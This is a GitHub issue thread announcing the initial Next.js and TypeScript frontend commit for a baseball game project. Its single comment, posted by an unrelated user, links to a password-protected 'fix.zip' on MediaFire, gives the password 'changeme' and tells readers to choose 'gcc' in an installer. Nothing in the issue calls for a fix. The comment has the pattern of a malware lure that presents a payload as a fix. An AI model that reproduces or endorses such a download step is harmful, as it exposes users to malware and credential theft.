### ISSUE TITLE
[Feat] React 앱 생성

### ISSUE THREAD

**Issue by bindingflare** [Ormi5-StrikeOut/Play-Baseball#7]
## 💡 개요
- Next.js enabled.
- Typescript enabled.
- ESLint enabled.

## 🤩 기능 설명
Initial commit (frontend).

## 🍒 세부 기능
N/A

## 📖 참고 사항
See README.md.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
